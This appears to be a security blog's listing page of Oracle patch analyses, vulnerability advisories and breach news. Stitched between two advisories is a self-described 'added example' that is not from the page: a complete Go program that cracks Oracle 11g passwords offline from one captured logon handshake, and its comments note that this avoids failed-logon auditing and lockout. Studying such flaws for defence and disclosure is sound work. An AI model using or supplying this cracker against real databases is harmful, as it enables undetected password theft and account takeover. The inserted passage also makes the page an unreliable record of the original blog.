The TeamSHATTER blog is now part of Spiderlabs – Anterior
Posted 3 years ago

Many of you are probably already aware of the acquisition of Application Security, Inc. by Trustwave. As part of the acquisition, we are pleased to announce that TeamSHATTER is combining…

TeamSHATTER’s Analysis of the October 2013 Oracle CPU
Posted 4 years ago

It’s the second Tuesday in October, so it is Oracle Critical Patch Update (CPU) time. The October 2013 CPU contains 127 fixes across Oracle’s Database, Fusion Middleware, Enterprise Manager, E-Business…

TeamSHATTER’s Analysis of the July 2013 Oracle CPU
Posted 4 years ago

It is Oracle Critical Patch Update (CPU) time, so lace up your patching gloves. The July 2013 CPU contains 89 fixes across Oracle’s Database, Fusion Middleware, Hyperion, Enterprise Manager, E-Business…


Advisory: Oracle Database GeoRaster API overflow (Team Shatter Exclusive)

Risk Level: High
Affected versions: Oracle Database 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, 11.2.0.3
Remotely exploitable: Yes
Credits: This vulnerability was discovered and researched by Martin Rakhmanov of Application Security Inc.
Details: GeoRaster is a feature of Oracle Spatial that lets you store, index, query, analyze, and deliver raster data. One of the GeoRaster APIs is prone to a stack-based overflow.
Impact: An attacker that can connect to a database with spatial support can…


Oracle Database 11g stealth password cracking vulnerability in logon protocol (CVE-2012-3137) (Team Shatter Exclusive)

The vulnerability I will describe in this blog post has some aspects that make it especially noteworthy, all of which derive from the fact that the issue lies in a critical portion of the authentication protocol. The vulnerability can be exploited stealthily and goes undetected, because all the attacker needs is information that the server sends freely as part of a normal authentication process. In addition, the vulnerability is so intimately part of the authentication protocol that it couldn’t…


Advisory: Oracle Enterprise Manager XSS in XDBResource cancelURL parameter (Team Shatter Exclusive)

Risk Level: High
Affected versions: Oracle Enterprise Manager Database Control 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, 11.2.0.3
Remotely exploitable: Yes
Credits: This vulnerability was discovered and researched by Qinglin Jiang of Application Security Inc.
Details: The Oracle Enterprise Manager Database Control XML Database Resources page is vulnerable to cross-site scripting. An attacker may inject malicious code into the web application and trick a legitimate user into executing it by various methods. The malicious code generally appears in the form of…


Advisory: Oracle 11g Stealth Password Cracking Vulnerability (Team Shatter Exclusive)

Risk Level: High
Affected versions: Oracle Database Server 11gR1, 11gR2
Remotely exploitable: Yes (no authentication to the Database Server is needed)
Credits: This vulnerability was discovered and researched by Esteban Martinez Fayo of Application Security Inc.
Details: There is a flaw in the way that Authentication Session Keys are generated and protected by Oracle Database Server during the authentication process. It is possible to use this flaw to perform unlimited password guesses (cracking) of any user password in a similar…

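The password-verification oracle that the CVE-2012-3137 post above and this advisory describe, as an added example in Go that is not code from this page or from Application Security Inc.: the server encrypts a padded session key under a key derived from the user's password and a salt it sends in the clear, so anyone holding one captured handshake can test candidate passwords offline by decrypting and checking the padding, with no further logon attempts for the server to audit. The key derivation (SHA-1 over password and salt, zero-extended to an AES-192 key), the 40-byte session key with 8 bytes of PKCS#7 padding, the zero IV and the final-block check follow public descriptions of the 11g O5LOGON handshake and are this example's assumptions, not text from this page; the captured values are constructed.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha1"
	"fmt"
)

// Layout assumed for this example (following public descriptions of the
// Oracle 11g O5LOGON handshake; not taken from this page):
//   AUTH_VFR_DATA : 10-byte salt the server sends in the clear
//   AUTH_SESSKEY  : 48 bytes = AES-192-CBC (zero IV) over 40 random bytes
//                   plus 8 bytes of PKCS#7 padding (0x08), keyed with
//                   SHA1(password || salt) extended by four zero bytes.
const (
	saltLen    = 10
	sessKeyLen = 40
	padLen     = 8
)

// deriveKey builds the 24-byte AES-192 key from the password and salt.
func deriveKey(password string, salt []byte) []byte {
	h := sha1.New()
	h.Write([]byte(password))
	h.Write(salt)
	key := make([]byte, 24)
	copy(key, h.Sum(nil)) // 20 digest bytes, then four zero bytes
	return key
}

// serverAuthSessKey models what the server sends: the session key,
// PKCS#7-padded, encrypted under the password-derived key.
func serverAuthSessKey(password string, salt, sessKey []byte) ([]byte, error) {
	if len(salt) != saltLen || len(sessKey) != sessKeyLen {
		return nil, fmt.Errorf("bad salt or session key length")
	}
	block, err := aes.NewCipher(deriveKey(password, salt))
	if err != nil {
		return nil, err
	}
	plain := append(append([]byte{}, sessKey...), bytes.Repeat([]byte{padLen}, padLen)...)
	out := make([]byte, len(plain))
	cipher.NewCBCEncrypter(block, make([]byte, aes.BlockSize)).CryptBlocks(out, plain)
	return out, nil
}

// guessIsCorrect is the attacker's offline check: decrypt the captured
// AUTH_SESSKEY with a candidate password and see whether the padding
// survives. Only the last block is needed; in CBC its IV is the previous
// ciphertext block, so one AES block operation per guess suffices.
func guessIsCorrect(candidate string, salt, authSessKey []byte) bool {
	if len(salt) != saltLen || len(authSessKey) != sessKeyLen+padLen {
		return false
	}
	block, err := aes.NewCipher(deriveKey(candidate, salt))
	if err != nil {
		return false
	}
	n := len(authSessKey)
	last := authSessKey[n-aes.BlockSize:]
	iv := authSessKey[n-2*aes.BlockSize : n-aes.BlockSize]
	plain := make([]byte, aes.BlockSize)
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(plain, last)
	return bytes.Equal(plain[aes.BlockSize-padLen:], bytes.Repeat([]byte{padLen}, padLen))
}

// crackOffline runs the check over a wordlist. Nothing here contacts the
// server, so failed-logon auditing and account lockout never trigger.
func crackOffline(wordlist []string, salt, authSessKey []byte) (string, bool) {
	for _, w := range wordlist {
		if guessIsCorrect(w, salt, authSessKey) {
			return w, true
		}
	}
	return "", false
}

func main() {
	// Constructed sample values; a real capture would be the AUTH_VFR_DATA
	// and AUTH_SESSKEY fields of one observed TNS logon exchange.
	salt := []byte("0123456789")
	sessKey := bytes.Repeat([]byte{0x42}, sessKeyLen)
	captured, _ := serverAuthSessKey("Welcome1", salt, sessKey)
	pw, ok := crackOffline([]string{"oracle", "manager", "Welcome1"}, salt, captured)
	fmt.Println(ok, pw)
}
```

A wrong candidate yields the eight 0x08 bytes with probability about 2^-64, so a single captured handshake is enough to confirm a guess. The decisive property is that the server encrypts material under a password-derived key before the client has proved anything, which turns the public handshake into an unlimited offline verifier.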

Advisory: SQL Injection in Oracle Alter FBA Table (Team Shatter Exclusive)

Risk Level: High
Affected versions: Oracle Database Enterprise Edition 11.1, 11.2
Remotely exploitable: Yes
Credits: This vulnerability was discovered and researched by Martin Rakhmanov of Application Security Inc.
Details: Renaming a table that has a flashback archive, using a specially crafted table name, triggers an internal SQL injection. This allows users to execute code with elevated privileges.
Impact: An attacker having control over a flashback-enabled table can get SYSDBA privileges.
Vendor Status: Vendor was contacted and a patch was released.
Workaround: Do not grant…


Tips To Granting Database Access Control Permissions

Posted February 13, 2013 in Database Security

Database permissions can cause headaches for even the most sophisticated security organizations. Indeed, many of the most persistent problems with malicious or risky database access start before the database server software is even up and running. Why are database access controls so maddeningly complex? In a word, flexibility: the very flexibility that lets organizations create multiple and interlocking roles can also create a knot of confusion and vulnerability.


Database Insecurity And The Trends Of 2013 (Team Shatter Exclusive)

What is in store for us in 2013? What new threats should organizations be aware of? Are you next to be hacked? Let’s first take a quick look back at the events of 2012. In the past twelve months, the good news is that the hacktivists went away (mostly). However, we saw an increase of 45% over 2011 in the number of breaches disclosed, there were lots of new database vulnerabilities reported and patched, including one with a CVSS 10.0…


TeamSHATTER’s Analysis Of The January 2013 Oracle CPU

Posted January 17, 2013 in Database Security, Oracle

It’s Oracle Critical Patch Update (CPU) Tuesday, so lace up your patching gloves and let’s get started. The January 2013 CPU contains 86 fixes across Oracle’s Database, Access Manager/Webgate, GoldenGate Veridata, Outside In, WebLogic, Application Performance Management, Enterprise Manager, E-Business Suite, Agile PLM Framework, PeopleSoft, JD Edwards EnterpriseOne Tools, Siebel CRM, Sun Product Suite, VirtualBox and MySQL product lines. 45 of the fixes in this CPU are for vulnerabilities that are remotely exploitable without authentication. In other words,…


Cyber Crime Is Growing, Yet Risk Typically Not Covered By Insurance Policies

Posted January 11, 2013 in Data Breach, Database Security

In September, the customer websites of Bank of America, Wells Fargo, US Bank, J.P. Morgan Chase and PNC were rendered inaccessible for more than a day by the biggest cyberattack in history, now attributed to Iranian government hackers. Weeks before, online vandals breached security at LinkedIn, stealing the passwords of six million people who frequent the popular business-networking site. Whether companies are the victims of state-sponsored invasions or criminal attacks, one of the scariest threats facing businesses today is hacking, and the…


South Carolina Agencies Still Working On Security Improvements

Months after a foreign hacker broke into the South Carolina Department of Revenue’s computer system, exposing millions of taxpayers’ personal records and causing the state to spend $20 million on added protection, state cabinet agencies are still working on security improvements, an examination by GreenvilleOnline.com shows. Just one of South Carolina Gov. Nikki Haley’s 15 cabinet agencies questioned by the website, the Department of Probation, Pardons and Parole, responded without qualifications that it had the full basic protections…
